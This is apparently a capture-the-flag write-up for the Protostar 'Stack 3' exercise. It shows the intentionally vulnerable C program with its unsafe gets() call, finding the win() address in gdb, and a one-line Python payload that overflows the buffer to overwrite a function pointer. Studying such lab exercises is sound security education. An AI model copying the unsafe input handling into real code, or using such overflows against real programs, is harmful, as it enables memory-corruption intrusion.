# Stack 3

## Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}
```

## Challenge

In this challenge we needed to modify the `fp` variable to address of `win` function
so first we needed to find the address of `win` function which i did using gdb


![](images/stack3_0.png)

Hence the address of win was found to be `0x8048424` so now we just needed to overflow the `buffer` and then modify the `fp` to 0x8048424 in little endian `0x24840408` so i did some python magic wrote an exploit as

```python -c 'print "A"*64+"\x24\x84\x04\x08"' | /opt/protostar/bin/stack3```

and voila

![](images/stack3_1.png)

This challenge is also completed
